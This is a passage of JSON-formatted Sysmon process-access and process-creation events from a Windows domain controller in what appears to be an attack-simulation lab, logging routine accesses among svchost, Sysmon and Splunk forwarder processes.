C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4582,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4583,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4584,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4585,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4586,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.568\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-001018480600}\r\nTargetProcessId: 2980\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.568","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-001018480600}","TargetProcessId":"2980","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:00.708\r\nSourceProcessGUID: {E2A3D6B1-1188-5F25-0000-001018480600}\r\nSourceProcessId: 2980\r\nSourceThreadId: 2892\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:00.708","SourceProcessGUID":"{E2A3D6B1-1188-5F25-0000-001018480600}","SourceProcessId":"2980","SourceThreadId":"2892","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4588,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.505\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.505","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4589,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nProcessGuid: {E2A3D6B1-1189-5F25-0000-0010A14A0600}\r\nProcessId: 4216\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","ProcessGuid":"{E2A3D6B1-1189-5F25-0000-0010A14A0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor 